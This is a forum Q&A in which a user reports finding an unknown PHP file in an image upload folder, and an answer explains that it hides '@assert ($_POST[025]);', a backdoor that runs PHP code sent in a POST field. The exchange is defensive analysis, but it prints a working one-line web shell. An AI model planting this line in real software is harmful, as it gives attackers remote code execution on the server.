James0325 James0325 - 4 months ago 22
PHP Question

Unknown PHP file in my upload folder, isn't malicious code?

Recently i found out my project got hacked and i found a script in my images folder which where a directory for user to upload their images (using file input). Here is the script that i found in the directory.




This code hides the following statement:

@assert ($_POST[025]);

Which means it'll execute the PHP code send in the POST variable "025". So, yes, this is indeed a backdoor! I recommend asking on security.stackexchange.com for help on how to properly deal with the fallout.